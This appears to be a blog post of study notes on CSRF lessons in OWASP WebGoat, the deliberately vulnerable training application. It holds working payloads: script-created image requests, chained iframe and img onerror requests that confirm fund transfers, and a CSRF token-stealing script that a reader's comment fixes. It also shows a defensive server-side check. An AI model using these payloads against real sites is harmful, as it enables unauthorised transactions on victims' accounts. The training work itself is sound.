WebGoat Part 2

This is part 2 of my notes on OWASP WebGoat V5.3.


  • Cross Site Request Forgery (CSRF)

    • Though this isn't what the lesson asks for, it also triggers the checkoff:

      • <script>var XSSImage=new Image(); XSSImage.src='http://localhost/webgoat/attack?Screen=13&menu=900&transferFunds=4000';</script>

    • The lesson text is inconsistent about the amount to transfer (4000, 5000, 400)

  • CSRF Prompt By-Pass

    • The screen number given in the solution for the iframe approach is wrong.  This worked:

      • <iframe
            src="http://localhost/webgoat/attack?Screen=5&menu=900&transferFunds=400"
            id="myFrame" frameborder="1" marginwidth="0"
            marginheight="0" width="800" scrolling=yes height="300"
            onload="document.getElementById('frame2').src='http://localhost/webgoat/attack?Screen=6&menu=900&transferFunds=CONFIRM';">

        </iframe>
           
        <iframe
            id="frame2" frameborder="1" marginwidth="0"
            marginheight="0" width="800" scrolling=yes height="300">
        </iframe>

    • The solution for the img tag needed the screen and menu numbers changed and was missing the /webgoat/ path segment.  This works:

      • <img src="http://localhost/webgoat/attack?Screen=6&menu=900&transferFunds=5000" onerror="document.getElementById('image2').src='http://localhost/webgoat/attack?Screen=6&menu=900&transferFunds=CONFIRM'" width="1" height="1" /><img id="image2" width="1" height="1" />

    • To try later: XMLHttpRequest over POST

  • CSRF Token By-Pass - Having trouble setting token:

    • <script language="javascript">
      <!--
      var tokenvalue;

      // runs when frame1 has loaded the transfer page; reads the CSRF token out of its form
      function readFrame1()
      {
        var frameDoc = document.getElementById("frame1").contentDocument;
        var form = frameDoc.getElementsByTagName("Form")[0];

        alert('Stops working here');

        var token = form.CSRFToken.value;
        alert(token);
        tokenvalue = '&CSRFToken='+token;
        loadFrame2();
      }

      // points frame2 at the transfer URL with the token appended
      function loadFrame2()
      {
        var testFrame = document.getElementById("frame2");
        testFrame.src="http://localhost/webgoat/attack?Screen=2&menu=900&transferFunds=4000"+tokenvalue;
      }
      //-->
      </script>

      <iframe src="http://localhost/webgoat/attack?Screen=2&menu=900&transferFunds=main" onload="readFrame1();" id="frame1" frameborder="1" marginwidth="0" marginheight="0" width="800" scrolling=yes height="300">
      </iframe>
      <iframe id="frame2" frameborder="1" marginwidth="0" marginheight="0" width="800" scrolling=yes height="300"></iframe>
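As an added example that is not part of these notes or of WebGoat, here is the server-side check a transferFunds handler needs so that the token-less GET requests produced by the img and iframe payloads above are rejected (Request, check_transfer and the localhost origin are assumed names). The token only protects against requests from another origin; script already running inside the application's own origin, which the token by-pass relies on, is an XSS problem that a CSRF token cannot fix.

```python
import hmac
import secrets
from urllib.parse import urlparse

# Added example, not WebGoat code. APP_ORIGIN is an assumption matching the
# http://localhost URLs used in the lesson.
APP_ORIGIN = "http://localhost"


def issue_token():
    """Per-session secret to embed in the transfer form as the CSRFToken field."""
    return secrets.token_urlsafe(32)


class Request:
    """Minimal stand-in for a framework request object (assumed name)."""

    def __init__(self, method, params, headers, session):
        self.method = method      # e.g. "GET" or "POST"
        self.params = params      # form/query parameters as a dict
        self.headers = headers    # request headers as a dict
        self.session = session    # server-side session as a dict


def check_transfer(req):
    """Return (allowed, reason) for a transferFunds request.

    Rejects: GET requests (what an <img>/<iframe> src fetch produces), requests
    whose Origin/Referer is not the application's own origin, and requests whose
    CSRFToken does not match the value stored in the session.
    """
    if req.method != "POST":
        return False, "state change must be POST"
    origin = req.headers.get("Origin") or req.headers.get("Referer")
    if origin is None:
        return False, "missing Origin/Referer"
    o = urlparse(origin)
    if f"{o.scheme}://{o.netloc}" != APP_ORIGIN:
        return False, "cross-site origin"
    expected = req.session.get("csrf_token")
    supplied = req.params.get("CSRFToken", "")
    # constant-time comparison so token mismatches do not leak timing
    if not expected or not hmac.compare_digest(expected.encode(), supplied.encode()):
        return False, "bad or missing CSRFToken"
    return True, "ok"
```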


For your CSRF Token-By-Pass

For your CSRF Token-By-Pass answer, the problem lies within "var form = frameDoc.getElementsByTagName("Form")[0];"

If you notice, there is a language selection box at the top of the page, which is form index 0.  If you change that to "var form = frameDoc.getElementsByTagName("Form")[1];" , you should find that it works.